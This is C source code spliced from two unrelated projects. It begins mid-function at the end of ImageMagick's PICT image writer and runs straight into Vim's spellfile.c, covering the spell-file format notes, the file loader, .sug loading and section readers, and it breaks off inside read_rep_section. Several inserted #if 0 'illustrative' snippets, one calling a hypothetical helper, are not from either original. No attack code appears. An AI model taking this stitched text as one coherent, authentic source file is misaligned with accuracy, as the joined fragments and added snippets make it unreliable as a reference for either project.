(void) WriteBlobMSBShort(image,(unsigned short) source_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) source_rectangle.right);
(void) WriteBlobMSBShort(image,(unsigned short) destination_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) destination_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) destination_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) destination_rectangle.right);
(void) WriteBlobMSBShort(image,(unsigned short) transfer_mode);
/*
Write picture data.
*/
count=0;
if (storage_class == PseudoClass)
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
scanline[x]=(unsigned char) GetPixelIndex(image,p);
p+=GetPixelChannels(image);
}
count+=EncodeImage(image,scanline,(size_t) (row_bytes & 0x7FFF),
packed_scanline);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
else
if (image_info->compression == JPEGCompression)
{
(void) ResetMagickMemory(scanline,0,row_bytes);
for (y=0; y < (ssize_t) image->rows; y++)
count+=EncodeImage(image,scanline,(size_t) (row_bytes & 0x7FFF),
packed_scanline);
}
else
{
register unsigned char
*blue,
*green,
*opacity,
*red;
red=scanline;
green=scanline+image->columns;
blue=scanline+2*image->columns;
opacity=scanline+3*image->columns;
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
red=scanline;
green=scanline+image->columns;
blue=scanline+2*image->columns;
if (image->alpha_trait != UndefinedPixelTrait)
{
opacity=scanline;
red=scanline+image->columns;
green=scanline+2*image->columns;
blue=scanline+3*image->columns;
}
for (x=0; x < (ssize_t) image->columns; x++)
{
*red++=ScaleQuantumToChar(GetPixelRed(image,p));
*green++=ScaleQuantumToChar(GetPixelGreen(image,p));
*blue++=ScaleQuantumToChar(GetPixelBlue(image,p));
if (image->alpha_trait != UndefinedPixelTrait)
*opacity++=ScaleQuantumToChar((Quantum) (GetPixelAlpha(image,p)));
p+=GetPixelChannels(image);
}
count+=EncodeImage(image,scanline,bytes_per_line & 0x7FFF,
packed_scanline);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
}
if ((count & 0x01) != 0)
(void) WriteBlobByte(image,'\0');
(void) WriteBlobMSBShort(image,PictEndOfPictureOp);
offset=TellBlob(image);
offset=SeekBlob(image,512,SEEK_SET);
(void) WriteBlobMSBShort(image,(unsigned short) offset);
scanline=(unsigned char *) RelinquishMagickMemory(scanline);
packed_scanline=(unsigned char *) RelinquishMagickMemory(packed_scanline);
buffer=(unsigned char *) RelinquishMagickMemory(buffer);
(void) CloseBlob(image);
return(MagickTrue);
}
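/*
  The block below is an illustrative sketch only and is excluded from the
  build with #if 0: it shows one plausible way a caller reaches
  WritePICTImage() through the generic MagickCore writer entry point.  The
  use of WriteImage() here and the "example.pict" filename are assumptions
  for illustration, not taken from this coder.
*/
#if 0
static void WritePICTExample(Image *image,ExceptionInfo *exception)
{
  ImageInfo
    *write_info;

  write_info=AcquireImageInfo();
  /* Select the PICT coder; the coder registry dispatches to WritePICTImage(). */
  (void) CopyMagickString(write_info->magick,"PICT",MagickPathExtent);
  (void) CopyMagickString(image->filename,"example.pict",MagickPathExtent);
  (void) WriteImage(write_info,image,exception);
  write_info=DestroyImageInfo(write_info);
}
#endif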
/* vi:set ts=8 sts=4 sw=4 noet:
*
* VIM - Vi IMproved by Bram Moolenaar
*
* Do ":help uganda" in Vim to read copying and usage conditions.
* Do ":help credits" in Vim to see a list of people who contributed.
* See README.txt for an overview of the Vim source code.
*/
/*
* spellfile.c: code for reading and writing spell files.
*
* See spell.c for information about spell checking.
*/
/*
* Vim spell file format: <HEADER>
* <SECTIONS>
* <LWORDTREE>
* <KWORDTREE>
* <PREFIXTREE>
*
* <HEADER>: <fileID> <versionnr>
*
* <fileID> 8 bytes "VIMspell"
* <versionnr> 1 byte VIMSPELLVERSION
*
*
* Sections make it possible to add information to the .spl file without
* making it incompatible with previous versions. There are two kinds of
* sections:
* 1. Not essential for correct spell checking. E.g. for making suggestions.
* These are skipped when not supported.
* 2. Optional information, but essential for spell checking when present.
* E.g. conditions for affixes. When this section is present but not
* supported an error message is given.
*
* <SECTIONS>: <section> ... <sectionend>
*
* <section>: <sectionID> <sectionflags> <sectionlen> (section contents)
*
* <sectionID> 1 byte number from 0 to 254 identifying the section
*
* <sectionflags> 1 byte SNF_REQUIRED: this section is required for correct
* spell checking
*
* <sectionlen> 4 bytes length of section contents, MSB first
*
* <sectionend> 1 byte SN_END
*
*
* sectionID == SN_INFO: <infotext>
* <infotext> N bytes free format text with spell file info (version,
* website, etc)
*
* sectionID == SN_REGION: <regionname> ...
* <regionname> 2 bytes Up to 8 region names: ca, au, etc. Lower case.
* First <regionname> is region 1.
*
* sectionID == SN_CHARFLAGS: <charflagslen> <charflags>
* <folcharslen> <folchars>
* <charflagslen> 1 byte Number of bytes in <charflags> (should be 128).
* <charflags> N bytes List of flags (first one is for character 128):
* 0x01 word character CF_WORD
* 0x02 upper-case character CF_UPPER
* <folcharslen> 2 bytes Number of bytes in <folchars>.
* <folchars> N bytes Folded characters, first one is for character 128.
*
* sectionID == SN_MIDWORD: <midword>
* <midword> N bytes Characters that are word characters only when used
* in the middle of a word.
*
* sectionID == SN_PREFCOND: <prefcondcnt> <prefcond> ...
* <prefcondcnt> 2 bytes Number of <prefcond> items following.
* <prefcond> : <condlen> <condstr>
* <condlen> 1 byte Length of <condstr>.
* <condstr> N bytes Condition for the prefix.
*
* sectionID == SN_REP: <repcount> <rep> ...
* <repcount> 2 bytes number of <rep> items, MSB first.
* <rep> : <repfromlen> <repfrom> <reptolen> <repto>
* <repfromlen> 1 byte length of <repfrom>
* <repfrom> N bytes "from" part of replacement
* <reptolen> 1 byte length of <repto>
* <repto> N bytes "to" part of replacement
*
* sectionID == SN_REPSAL: <repcount> <rep> ...
* just like SN_REP but for soundfolded words
*
* sectionID == SN_SAL: <salflags> <salcount> <sal> ...
* <salflags> 1 byte flags for soundsalike conversion:
* SAL_F0LLOWUP
* SAL_COLLAPSE
* SAL_REM_ACCENTS
* <salcount> 2 bytes number of <sal> items following
* <sal> : <salfromlen> <salfrom> <saltolen> <salto>
* <salfromlen> 1 byte length of <salfrom>
* <salfrom> N bytes "from" part of soundsalike
* <saltolen> 1 byte length of <salto>
* <salto> N bytes "to" part of soundsalike
*
* sectionID == SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* <sofofromlen> 2 bytes length of <sofofrom>
* <sofofrom> N bytes "from" part of soundfold
* <sofotolen> 2 bytes length of <sofoto>
* <sofoto> N bytes "to" part of soundfold
*
* sectionID == SN_SUGFILE: <timestamp>
* <timestamp> 8 bytes time in seconds that must match with .sug file
*
* sectionID == SN_NOSPLITSUGS: nothing
*
* sectionID == SN_NOCOMPOUNDSUGS: nothing
*
* sectionID == SN_WORDS: <word> ...
* <word> N bytes NUL terminated common word
*
* sectionID == SN_MAP: <mapstr>
* <mapstr> N bytes String with sequences of similar characters,
* separated by slashes.
*
* sectionID == SN_COMPOUND: <compmax> <compminlen> <compsylmax> <compoptions>
* <comppatcount> <comppattern> ... <compflags>
* <compmax> 1 byte Maximum nr of words in compound word.
* <compminlen> 1 byte Minimal word length for compounding.
* <compsylmax> 1 byte Maximum nr of syllables in compound word.
* <compoptions> 2 bytes COMP_ flags.
* <comppatcount> 2 bytes number of <comppattern> following
* <compflags> N bytes Flags from COMPOUNDRULE items, separated by
* slashes.
*
* <comppattern>: <comppatlen> <comppattext>
* <comppatlen> 1 byte length of <comppattext>
* <comppattext> N bytes end or begin chars from CHECKCOMPOUNDPATTERN
*
* sectionID == SN_NOBREAK: (empty, its presence is what matters)
*
* sectionID == SN_SYLLABLE: <syllable>
* <syllable> N bytes String from SYLLABLE item.
*
* <LWORDTREE>: <wordtree>
*
* <KWORDTREE>: <wordtree>
*
* <PREFIXTREE>: <wordtree>
*
*
* <wordtree>: <nodecount> <nodedata> ...
*
* <nodecount> 4 bytes Number of nodes following. MSB first.
*
* <nodedata>: <siblingcount> <sibling> ...
*
* <siblingcount> 1 byte Number of siblings in this node. The siblings
* follow in sorted order.
*
* <sibling>: <byte> [ <nodeidx> <xbyte>
* | <flags> [<flags2>] [<region>] [<affixID>]
* | [<pflags>] <affixID> <prefcondnr> ]
*
* <byte> 1 byte Byte value of the sibling. Special cases:
* BY_NOFLAGS: End of word without flags and for all
* regions.
* For PREFIXTREE <affixID> and
* <prefcondnr> follow.
* BY_FLAGS: End of word, <flags> follow.
* For PREFIXTREE <pflags>, <affixID>
* and <prefcondnr> follow.
* BY_FLAGS2: End of word, <flags> and <flags2>
* follow. Not used in PREFIXTREE.
* BY_INDEX: Child of sibling is shared, <nodeidx>
* and <xbyte> follow.
*
* <nodeidx> 3 bytes Index of child for this sibling, MSB first.
*
* <xbyte> 1 byte byte value of the sibling.
*
* <flags> 1 byte bitmask of:
* WF_ALLCAP word must have only capitals
* WF_ONECAP first char of word must be capital
* WF_KEEPCAP keep-case word
* WF_FIXCAP keep-case word, all caps not allowed
* WF_RARE rare word
* WF_BANNED bad word
* WF_REGION <region> follows
* WF_AFX <affixID> follows
*
* <flags2> 1 byte Bitmask of:
* WF_HAS_AFF >> 8 word includes affix
* WF_NEEDCOMP >> 8 word only valid in compound
* WF_NOSUGGEST >> 8 word not used for suggestions
* WF_COMPROOT >> 8 word already a compound
* WF_NOCOMPBEF >> 8 no compounding before this word
* WF_NOCOMPAFT >> 8 no compounding after this word
*
* <pflags> 1 byte bitmask of:
* WFP_RARE rare prefix
* WFP_NC non-combining prefix
* WFP_UP letter after prefix made upper case
*
* <region> 1 byte Bitmask for regions in which word is valid. When
* omitted it's valid in all regions.
* Lowest bit is for region 1.
*
* <affixID> 1 byte ID of affix that can be used with this word. In
* PREFIXTREE used for the required prefix ID.
*
* <prefcondnr> 2 bytes Prefix condition number, index in <prefcond> list
* from HEADER.
*
* All text characters are in 'encoding', but stored as single bytes.
*/
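/*
 * Illustrative sketch only (kept out of the build with #if 0): how one
 * <section> header from the layout above is read.  It mirrors the loop in
 * spell_load_file() below; "fd", "n", "flags" and "len" are placeholder
 * variables and section_is_supported() is a hypothetical helper, not a real
 * Vim function.
 */
#if 0
    n = getc(fd);			/* <sectionID> or <sectionend> */
    if (n == SN_END)
	return;				/* no more sections follow */
    flags = getc(fd);			/* <sectionflags> */
    len = get4c(fd);			/* <sectionlen>: 4 bytes, MSB first */
    if (len < 0)
	return;				/* truncated file */
    if (!section_is_supported(n) && (flags & SNF_REQUIRED))
	return;				/* required section we cannot handle */
#endif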
/*
* Vim .sug file format: <SUGHEADER>
* <SUGWORDTREE>
* <SUGTABLE>
*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*
* <fileID> 6 bytes "VIMsug"
* <versionnr> 1 byte VIMSUGVERSION
* <timestamp> 8 bytes timestamp that must match with .spl file
*
*
* <SUGWORDTREE>: <wordtree> (see above, no flags or region used)
*
*
* <SUGTABLE>: <sugwcount> <sugline> ...
*
* <sugwcount> 4 bytes number of <sugline> following
*
* <sugline>: <sugnr> ... NUL
*
* <sugnr>: X bytes word number that results in this soundfolded word,
* stored as an offset to the previous number in as
* few bytes as possible, see offset2bytes())
*/
#include "vim.h"
#if defined(FEAT_SPELL) || defined(PROTO)
#ifndef UNIX /* it's in os_unix.h for Unix */
# include <time.h> /* for time_t */
#endif
/* Special byte values for <byte>. Some are only used in the tree for
* postponed prefixes, some only in the other trees. This is a bit messy... */
#define BY_NOFLAGS 0 /* end of word without flags or region; for
* postponed prefix: no <pflags> */
#define BY_INDEX 1 /* child is shared, index follows */
#define BY_FLAGS 2 /* end of word, <flags> byte follows; for
* postponed prefix: <pflags> follows */
#define BY_FLAGS2 3 /* end of word, <flags> and <flags2> bytes
* follow; never used in prefix tree */
#define BY_SPECIAL BY_FLAGS2 /* highest special byte value */
/* Flags used in .spl file for soundsalike flags. */
#define SAL_F0LLOWUP 1
#define SAL_COLLAPSE 2
#define SAL_REM_ACCENTS 4
#define VIMSPELLMAGIC "VIMspell" /* string at start of Vim spell file */
#define VIMSPELLMAGICL 8
#define VIMSPELLVERSION 50
/* Section IDs. Only renumber them when VIMSPELLVERSION changes! */
#define SN_REGION 0 /* <regionname> section */
#define SN_CHARFLAGS 1 /* charflags section */
#define SN_MIDWORD 2 /* <midword> section */
#define SN_PREFCOND 3 /* <prefcond> section */
#define SN_REP 4 /* REP items section */
#define SN_SAL 5 /* SAL items section */
#define SN_SOFO 6 /* soundfolding section */
#define SN_MAP 7 /* MAP items section */
#define SN_COMPOUND 8 /* compound words section */
#define SN_SYLLABLE 9 /* syllable section */
#define SN_NOBREAK 10 /* NOBREAK section */
#define SN_SUGFILE 11 /* timestamp for .sug file */
#define SN_REPSAL 12 /* REPSAL items section */
#define SN_WORDS 13 /* common words */
#define SN_NOSPLITSUGS 14 /* don't split word for suggestions */
#define SN_INFO 15 /* info section */
#define SN_NOCOMPOUNDSUGS 16 /* don't compound for suggestions */
#define SN_END 255 /* end of sections */
#define SNF_REQUIRED 1 /* <sectionflags>: required section */
#define CF_WORD 0x01
#define CF_UPPER 0x02
static int set_spell_finish(spelltab_T *new_st);
static int write_spell_prefcond(FILE *fd, garray_T *gap);
static char_u *read_cnt_string(FILE *fd, int cnt_bytes, int *lenp);
static int read_region_section(FILE *fd, slang_T *slang, int len);
static int read_charflags_section(FILE *fd);
static int read_prefcond_section(FILE *fd, slang_T *lp);
static int read_rep_section(FILE *fd, garray_T *gap, short *first);
static int read_sal_section(FILE *fd, slang_T *slang);
static int read_words_section(FILE *fd, slang_T *lp, int len);
static int read_sofo_section(FILE *fd, slang_T *slang);
static int read_compound(FILE *fd, slang_T *slang, int len);
static int set_sofo(slang_T *lp, char_u *from, char_u *to);
static void set_sal_first(slang_T *lp);
#ifdef FEAT_MBYTE
static int *mb_str2wide(char_u *s);
#endif
static int spell_read_tree(FILE *fd, char_u **bytsp, idx_T **idxsp, int prefixtree, int prefixcnt);
static idx_T read_tree_node(FILE *fd, char_u *byts, idx_T *idxs, int maxidx, idx_T startidx, int prefixtree, int maxprefcondnr);
static void spell_reload_one(char_u *fname, int added_word);
static void set_spell_charflags(char_u *flags, int cnt, char_u *upp);
static int set_spell_chartab(char_u *fol, char_u *low, char_u *upp);
static void set_map_str(slang_T *lp, char_u *map);
static char *e_spell_trunc = N_("E758: Truncated spell file");
static char *e_afftrailing = N_("Trailing text in %s line %d: %s");
static char *e_affname = N_("Affix name too long in %s line %d: %s");
static char *e_affform = N_("E761: Format error in affix file FOL, LOW or UPP");
static char *e_affrange = N_("E762: Character in FOL, LOW or UPP is out of range");
static char *msg_compressing = N_("Compressing word tree...");
/*
* Load one spell file and store the info into a slang_T.
*
* This is invoked in three ways:
* - From spell_load_cb() to load a spell file for the first time. "lang" is
* the language name, "old_lp" is NULL. Will allocate an slang_T.
* - To reload a spell file that was changed. "lang" is NULL and "old_lp"
* points to the existing slang_T.
* - Just after writing a .spl file; it's read back to produce the .sug file.
* "old_lp" is NULL and "lang" is NULL. Will allocate an slang_T.
*
* Returns the slang_T the spell file was loaded into. NULL for error.
*/
slang_T *
spell_load_file(
char_u *fname,
char_u *lang,
slang_T *old_lp,
int silent) /* no error if file doesn't exist */
{
FILE *fd;
char_u buf[VIMSPELLMAGICL];
char_u *p;
int i;
int n;
int len;
char_u *save_sourcing_name = sourcing_name;
linenr_T save_sourcing_lnum = sourcing_lnum;
slang_T *lp = NULL;
int c = 0;
int res;
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
if (!silent)
EMSG2(_(e_notopen), fname);
else if (p_verbose > 2)
{
verbose_enter();
smsg((char_u *)e_notopen, fname);
verbose_leave();
}
goto endFAIL;
}
if (p_verbose > 2)
{
verbose_enter();
smsg((char_u *)_("Reading spell file \"%s\""), fname);
verbose_leave();
}
if (old_lp == NULL)
{
lp = slang_alloc(lang);
if (lp == NULL)
goto endFAIL;
/* Remember the file name, used to reload the file when it's updated. */
lp->sl_fname = vim_strsave(fname);
if (lp->sl_fname == NULL)
goto endFAIL;
/* Check for .add.spl (_add.spl for VMS). */
lp->sl_add = strstr((char *)gettail(fname), SPL_FNAME_ADD) != NULL;
}
else
lp = old_lp;
/* Set sourcing_name, so that error messages mention the file name. */
sourcing_name = fname;
sourcing_lnum = 0;
/*
* <HEADER>: <fileID>
*/
for (i = 0; i < VIMSPELLMAGICL; ++i)
buf[i] = getc(fd); /* <fileID> */
if (STRNCMP(buf, VIMSPELLMAGIC, VIMSPELLMAGICL) != 0)
{
EMSG(_("E757: This does not look like a spell file"));
goto endFAIL;
}
c = getc(fd); /* <versionnr> */
if (c < VIMSPELLVERSION)
{
EMSG(_("E771: Old spell file, needs to be updated"));
goto endFAIL;
}
else if (c > VIMSPELLVERSION)
{
EMSG(_("E772: Spell file is for newer version of Vim"));
goto endFAIL;
}
/*
* <SECTIONS>: <section> ... <sectionend>
* <section>: <sectionID> <sectionflags> <sectionlen> (section contents)
*/
for (;;)
{
n = getc(fd); /* <sectionID> or <sectionend> */
if (n == SN_END)
break;
c = getc(fd); /* <sectionflags> */
len = get4c(fd); /* <sectionlen> */
if (len < 0)
goto truncerr;
res = 0;
switch (n)
{
case SN_INFO:
lp->sl_info = read_string(fd, len); /* <infotext> */
if (lp->sl_info == NULL)
goto endFAIL;
break;
case SN_REGION:
res = read_region_section(fd, lp, len);
break;
case SN_CHARFLAGS:
res = read_charflags_section(fd);
break;
case SN_MIDWORD:
lp->sl_midword = read_string(fd, len); /* <midword> */
if (lp->sl_midword == NULL)
goto endFAIL;
break;
case SN_PREFCOND:
res = read_prefcond_section(fd, lp);
break;
case SN_REP:
res = read_rep_section(fd, &lp->sl_rep, lp->sl_rep_first);
break;
case SN_REPSAL:
res = read_rep_section(fd, &lp->sl_repsal, lp->sl_repsal_first);
break;
case SN_SAL:
res = read_sal_section(fd, lp);
break;
case SN_SOFO:
res = read_sofo_section(fd, lp);
break;
case SN_MAP:
p = read_string(fd, len); /* <mapstr> */
if (p == NULL)
goto endFAIL;
set_map_str(lp, p);
vim_free(p);
break;
case SN_WORDS:
res = read_words_section(fd, lp, len);
break;
case SN_SUGFILE:
lp->sl_sugtime = get8ctime(fd); /* <timestamp> */
break;
case SN_NOSPLITSUGS:
lp->sl_nosplitsugs = TRUE;
break;
case SN_NOCOMPOUNDSUGS:
lp->sl_nocompoundsugs = TRUE;
break;
case SN_COMPOUND:
res = read_compound(fd, lp, len);
break;
case SN_NOBREAK:
lp->sl_nobreak = TRUE;
break;
case SN_SYLLABLE:
lp->sl_syllable = read_string(fd, len); /* <syllable> */
if (lp->sl_syllable == NULL)
goto endFAIL;
if (init_syl_tab(lp) == FAIL)
goto endFAIL;
break;
default:
/* Unsupported section. When it's required give an error
* message. When it's not required skip the contents. */
if (c & SNF_REQUIRED)
{
EMSG(_("E770: Unsupported section in spell file"));
goto endFAIL;
}
while (--len >= 0)
if (getc(fd) < 0)
goto truncerr;
break;
}
someerror:
if (res == SP_FORMERROR)
{
EMSG(_(e_format));
goto endFAIL;
}
if (res == SP_TRUNCERROR)
{
truncerr:
EMSG(_(e_spell_trunc));
goto endFAIL;
}
if (res == SP_OTHERERROR)
goto endFAIL;
}
/* <LWORDTREE> */
res = spell_read_tree(fd, &lp->sl_fbyts, &lp->sl_fidxs, FALSE, 0);
if (res != 0)
goto someerror;
/* <KWORDTREE> */
res = spell_read_tree(fd, &lp->sl_kbyts, &lp->sl_kidxs, FALSE, 0);
if (res != 0)
goto someerror;
/* <PREFIXTREE> */
res = spell_read_tree(fd, &lp->sl_pbyts, &lp->sl_pidxs, TRUE,
lp->sl_prefixcnt);
if (res != 0)
goto someerror;
/* For a new file link it in the list of spell files. */
if (old_lp == NULL && lang != NULL)
{
lp->sl_next = first_lang;
first_lang = lp;
}
goto endOK;
endFAIL:
if (lang != NULL)
/* truncating the name signals the error to spell_load_lang() */
*lang = NUL;
if (lp != NULL && old_lp == NULL)
slang_free(lp);
lp = NULL;
endOK:
if (fd != NULL)
fclose(fd);
sourcing_name = save_sourcing_name;
sourcing_lnum = save_sourcing_lnum;
return lp;
}
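/*
 * Illustrative sketch only (kept out of the build with #if 0): the three
 * call patterns described in the comment above spell_load_file().  "fname",
 * "lang", "old_lp" and "wfname" are placeholders; the exact arguments used
 * by the real callers may differ.
 */
#if 0
    /* 1. First load from spell_load_cb(): language name given, no old
     *    slang_T, so a new one is allocated. */
    lp = spell_load_file(fname, lang, NULL, FALSE);

    /* 2. Reload a spell file that changed: reuse the existing slang_T. */
    (void)spell_load_file(fname, NULL, old_lp, FALSE);

    /* 3. After writing a .spl file, read it back to produce the .sug file. */
    lp = spell_load_file(wfname, NULL, NULL, TRUE);
#endif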
/*
* Fill in the wordcount fields for a trie.
 * The number of words under each node is stored in the node's index entry.
*/
static void
tree_count_words(char_u *byts, idx_T *idxs)
{
int depth;
idx_T arridx[MAXWLEN];
int curi[MAXWLEN];
int c;
idx_T n;
int wordcount[MAXWLEN];
arridx[0] = 0;
curi[0] = 1;
wordcount[0] = 0;
depth = 0;
while (depth >= 0 && !got_int)
{
if (curi[depth] > byts[arridx[depth]])
{
/* Done all bytes at this node, go up one level. */
idxs[arridx[depth]] = wordcount[depth];
if (depth > 0)
wordcount[depth - 1] += wordcount[depth];
--depth;
fast_breakcheck();
}
else
{
/* Do one more byte at this node. */
n = arridx[depth] + curi[depth];
++curi[depth];
c = byts[n];
if (c == 0)
{
/* End of word, count it. */
++wordcount[depth];
/* Skip over any other NUL bytes (same word with different
* flags). */
while (byts[n + 1] == 0)
{
++n;
++curi[depth];
}
}
else
{
/* Normal char, go one level deeper to count the words. */
++depth;
arridx[depth] = idxs[n];
curi[depth] = 1;
wordcount[depth] = 0;
}
}
}
}
/*
* Load the .sug files for languages that have one and weren't loaded yet.
*/
void
suggest_load_files(void)
{
langp_T *lp;
int lpi;
slang_T *slang;
char_u *dotp;
FILE *fd;
char_u buf[MAXWLEN];
int i;
time_t timestamp;
int wcount;
int wordnr;
garray_T ga;
int c;
/* Do this for all languages that support sound folding. */
for (lpi = 0; lpi < curwin->w_s->b_langp.ga_len; ++lpi)
{
lp = LANGP_ENTRY(curwin->w_s->b_langp, lpi);
slang = lp->lp_slang;
if (slang->sl_sugtime != 0 && !slang->sl_sugloaded)
{
/* Change ".spl" to ".sug" and open the file. When the file isn't
* found silently skip it. Do set "sl_sugloaded" so that we
* don't try again and again. */
slang->sl_sugloaded = TRUE;
dotp = vim_strrchr(slang->sl_fname, '.');
if (dotp == NULL || fnamecmp(dotp, ".spl") != 0)
continue;
STRCPY(dotp, ".sug");
fd = mch_fopen((char *)slang->sl_fname, "r");
if (fd == NULL)
goto nextone;
/*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*/
for (i = 0; i < VIMSUGMAGICL; ++i)
buf[i] = getc(fd); /* <fileID> */
if (STRNCMP(buf, VIMSUGMAGIC, VIMSUGMAGICL) != 0)
{
EMSG2(_("E778: This does not look like a .sug file: %s"),
slang->sl_fname);
goto nextone;
}
c = getc(fd); /* <versionnr> */
if (c < VIMSUGVERSION)
{
EMSG2(_("E779: Old .sug file, needs to be updated: %s"),
slang->sl_fname);
goto nextone;
}
else if (c > VIMSUGVERSION)
{
EMSG2(_("E780: .sug file is for newer version of Vim: %s"),
slang->sl_fname);
goto nextone;
}
/* Check the timestamp, it must be exactly the same as the one in
* the .spl file. Otherwise the word numbers won't match. */
timestamp = get8ctime(fd); /* <timestamp> */
if (timestamp != slang->sl_sugtime)
{
EMSG2(_("E781: .sug file doesn't match .spl file: %s"),
slang->sl_fname);
goto nextone;
}
/*
* <SUGWORDTREE>: <wordtree>
* Read the trie with the soundfolded words.
*/
if (spell_read_tree(fd, &slang->sl_sbyts, &slang->sl_sidxs,
FALSE, 0) != 0)
{
someerror:
EMSG2(_("E782: error while reading .sug file: %s"),
slang->sl_fname);
slang_clear_sug(slang);
goto nextone;
}
/*
* <SUGTABLE>: <sugwcount> <sugline> ...
*
* Read the table with word numbers. We use a file buffer for
* this, because it's so much like a file with lines. Makes it
* possible to swap the info and save on memory use.
*/
slang->sl_sugbuf = open_spellbuf();
if (slang->sl_sugbuf == NULL)
goto someerror;
/* <sugwcount> */
wcount = get4c(fd);
if (wcount < 0)
goto someerror;
/* Read all the wordnr lists into the buffer, one NUL terminated
* list per line. */
ga_init2(&ga, 1, 100);
for (wordnr = 0; wordnr < wcount; ++wordnr)
{
ga.ga_len = 0;
for (;;)
{
c = getc(fd); /* <sugline> */
if (c < 0 || ga_grow(&ga, 1) == FAIL)
goto someerror;
((char_u *)ga.ga_data)[ga.ga_len++] = c;
if (c == NUL)
break;
}
if (ml_append_buf(slang->sl_sugbuf, (linenr_T)wordnr,
ga.ga_data, ga.ga_len, TRUE) == FAIL)
goto someerror;
}
ga_clear(&ga);
/*
* Need to put word counts in the word tries, so that we can find
* a word by its number.
*/
tree_count_words(slang->sl_fbyts, slang->sl_fidxs);
tree_count_words(slang->sl_sbyts, slang->sl_sidxs);
nextone:
if (fd != NULL)
fclose(fd);
STRCPY(dotp, ".spl");
}
}
}
/*
* Read a length field from "fd" in "cnt_bytes" bytes.
* Allocate memory, read the string into it and add a NUL at the end.
* Returns NULL when the count is zero.
* Sets "*cntp" to SP_*ERROR when there is an error, length of the result
* otherwise.
*/
static char_u *
read_cnt_string(FILE *fd, int cnt_bytes, int *cntp)
{
int cnt = 0;
int i;
char_u *str;
/* read the length bytes, MSB first */
for (i = 0; i < cnt_bytes; ++i)
cnt = (cnt << 8) + getc(fd);
if (cnt < 0)
{
*cntp = SP_TRUNCERROR;
return NULL;
}
*cntp = cnt;
if (cnt == 0)
return NULL; /* nothing to read, return NULL */
str = read_string(fd, cnt);
if (str == NULL)
*cntp = SP_OTHERERROR;
return str;
}
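/*
 * Illustrative example (kept out of the build with #if 0): with
 * cnt_bytes == 2, the bytes 0x00 0x03 'a' 'b' 'c' give a count of 3, an
 * allocated NUL-terminated string "abc" and *cntp set to 3.  "fd", "p" and
 * "len" below are placeholders.
 */
#if 0
    p = read_cnt_string(fd, 2, &len);
    if (len < 0)
	;			/* SP_TRUNCERROR or SP_OTHERERROR */
    else if (p == NULL)
	;			/* the count was zero, nothing was read */
#endif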
/*
* Read SN_REGION: <regionname> ...
* Return SP_*ERROR flags.
*/
static int
read_region_section(FILE *fd, slang_T *lp, int len)
{
int i;
if (len > 16)
return SP_FORMERROR;
for (i = 0; i < len; ++i)
lp->sl_regions[i] = getc(fd); /* <regionname> */
lp->sl_regions[len] = NUL;
return 0;
}
/*
* Read SN_CHARFLAGS section: <charflagslen> <charflags>
* <folcharslen> <folchars>
* Return SP_*ERROR flags.
*/
static int
read_charflags_section(FILE *fd)
{
char_u *flags;
char_u *fol;
int flagslen, follen;
/* <charflagslen> <charflags> */
flags = read_cnt_string(fd, 1, &flagslen);
if (flagslen < 0)
return flagslen;
/* <folcharslen> <folchars> */
fol = read_cnt_string(fd, 2, &follen);
if (follen < 0)
{
vim_free(flags);
return follen;
}
/* Set the word-char flags and fill SPELL_ISUPPER() table. */
if (flags != NULL && fol != NULL)
set_spell_charflags(flags, flagslen, fol);
vim_free(flags);
vim_free(fol);
    /* When <charflagslen> is zero then <folcharslen> must also be zero. */
if ((flags == NULL) != (fol == NULL))
return SP_FORMERROR;
return 0;
}
/*
* Read SN_PREFCOND section.
* Return SP_*ERROR flags.
*/
static int
read_prefcond_section(FILE *fd, slang_T *lp)
{
int cnt;
int i;
int n;
char_u *p;
char_u buf[MAXWLEN + 1];
/* <prefcondcnt> <prefcond> ... */
cnt = get2c(fd); /* <prefcondcnt> */
if (cnt <= 0)
return SP_FORMERROR;
lp->sl_prefprog = (regprog_T **)alloc_clear(
(unsigned)sizeof(regprog_T *) * cnt);
if (lp->sl_prefprog == NULL)
return SP_OTHERERROR;
lp->sl_prefixcnt = cnt;
for (i = 0; i < cnt; ++i)
{
/* <prefcond> : <condlen> <condstr> */
n = getc(fd); /* <condlen> */
if (n < 0 || n >= MAXWLEN)
return SP_FORMERROR;
/* When <condlen> is zero we have an empty condition. Otherwise
* compile the regexp program used to check for the condition. */
if (n > 0)
{
buf[0] = '^'; /* always match at one position only */
p = buf + 1;
while (n-- > 0)
*p++ = getc(fd); /* <condstr> */
*p = NUL;
lp->sl_prefprog[i] = vim_regcomp(buf, RE_MAGIC + RE_STRING);
}
}
return 0;
}
/*
* Read REP or REPSAL items section from "fd": <repcount> <rep> ...
* Return SP_*ERROR flags.
*/
static int
read_rep_section(FILE *fd, garray_T *gap, short *first)
{
int cnt;
fromto_T *ftp;
int i;
cnt = get2c(fd); /* <repcount> */
if (cnt < 0)
return SP_TRUNCERROR;
if (ga_grow(gap, cnt) == FAIL)
return SP_OTHERERROR;
/* <rep> : <repfromlen> <repfrom> <reptolen> <repto> */
for (; gap->ga_len < cnt; ++gap->ga_len)
{
ftp = &((fromto_T *)gap->ga_data)[gap->ga_len];
ftp->ft_from = read_cnt_string(fd, 1, &i);
if (i < 0)
return i;
if (i == 0)
return SP_FORMERROR;
ftp->ft_to = read_cnt_string(fd, 1, &i);
if (i <= 0)
{
vim_free(ftp->ft_from);
if (i < 0)
return i;
return SP_FORMERROR;
}
}
/* Fill the first-index table. */
for (i = 0; i < 256; ++i)
first[i] = -1;
for (i = 0; i < gap->ga_len; ++i)
{
ftp = &((fromto_T *)gap->ga_data)[i];
if (first[*ftp->ft_from] == -1)
